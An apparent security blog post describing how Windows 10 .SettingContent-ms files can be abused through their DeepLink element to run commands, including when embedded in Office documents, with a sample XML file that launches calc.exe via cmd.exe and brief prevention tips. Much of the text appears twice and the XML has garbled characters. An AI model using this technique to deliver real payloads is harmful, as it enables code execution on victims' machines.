There's a new infection vector can be tapped into, one that circumvents the current protection settings and even Microsoft's new Attack Surface Reduction technology.
.SettingContent-ms file type is a format that was introduced in Windows 10 and allows a user to create shortcuts to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
A modified ControlPanel.settingcontent-ms file to run calc.exe
This feature can be abused because one of its elements (DeepLink) allows for any binary with parameters to be executed. All that an attacker needs to do is add his own command using Powershell.exe or Cmd.exe, as typical with most attacks.
By embedding a specially-crafted settings file into an Office document, an attacker can trick a user to run malicious code without any further warning or notification.
How to Prevent these Attacks
1) Use my simple hack to force Poweshell a UAC pop-up, allowing you to deny script launches.
2) https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 add to AVP
Sources:
1. https://blog.malwarebytes.com/threat-analysis/2018/07/new-macro-less-technique-used-distribute-malware/
2. https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39
.SettingContent-ms file type is a format that was introduced in Windows 10 and allows a user to create shortcuts to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
A modified ControlPanel.settingcontent-ms file to run calc.exe
<?xml version-"1.0" encoding-"UTF-8"?> <PCSettings> <SearchableContent xmlns="http://schemas.microsoft. com/Search/2013/SettingContent"> <ApplicationInformation> <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID> <DeepLink>cmd.exe /c calc.exe</DeepLink> <Icon>%windir%\system32\calc.exe</Icon> </ApplicationInformation> <SettingIdentity> <PageID></PageID> <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D)</HostID> </SettingIdentity> <SettingInformation> <Description>@shel132.dll, -4161</Description> <Keywords>@shel132. dll, -4161</Keywords> </SettingInformation> </SearchableContent> </PCSettings>
This feature can be abused because one of its elements (DeepLink) allows for any binary with parameters to be executed. All that an attacker needs to do is add his own command using Powershell.exe or Cmd.exe, as typical with most attacks.
By embedding a specially-crafted settings file into an Office document, an attacker can trick a user to run malicious code without any further warning or notification.
Embedded OLE .settingcontenct-ms object when click could trick user to open content |
How to Prevent these Attacks
1) Use my simple hack to force Poweshell a UAC pop-up, allowing you to deny script launches.
2) https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 add to AVP
Sources:
1. https://blog.malwarebytes.com/threat-analysis/2018/07/new-macro-less-technique-used-distribute-malware/
2. https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39
No comments:
Post a Comment